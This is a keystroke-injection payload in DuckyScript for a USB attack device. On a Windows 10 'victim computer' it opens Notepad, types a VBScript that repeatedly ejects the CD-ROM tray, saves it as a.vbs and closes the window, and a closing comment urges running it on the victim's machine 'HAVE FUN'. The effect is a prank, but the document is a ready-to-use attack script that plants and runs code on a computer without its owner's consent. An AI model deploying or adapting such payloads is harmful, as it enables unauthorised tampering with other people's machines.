DELAY 500
GUI r
DELAY 200
STRING notepad
DELAY 200
ENTER
DELAY 200
STRING opentimes = 5    
ENTER
STRING Set oWMP = CreateObject("WMPlayer.OCX" )
ENTER
STRING Set colCDROMs = oWMP.cdromCollection
ENTER
STRING For x=0 to opentimes
ENTER
STRING If colCDROMs.Count >= 1 then
ENTER
STRING For i = 0 to colCDROMs.Count - 1
ENTER
STRING colCDROMs.Item(i).Eject
ENTER
STRING Next
ENTER
STRING End If
ENTER
STRING Wscript.Sleep 500
ENTER
STRING If colCDROMs.Count >= 1 then
ENTER
STRING For i = 0 to colCDROMs.Count - 1
ENTER
STRING colCDROMs.Item(i).Eject
ENTER
STRING Next
ENTER
STRING End If
ENTER
STRING Next
ENTER


DELAY 300
CONTROL s
DELAY 700
STRING a.vbs
DELAY 200
ENTER
DELAY 200
ALT F4
DELAY 200

#Tested on WIN10
#-----> After running the script, open the shell console on the victim computer and execute the script. HAVE FUN :)
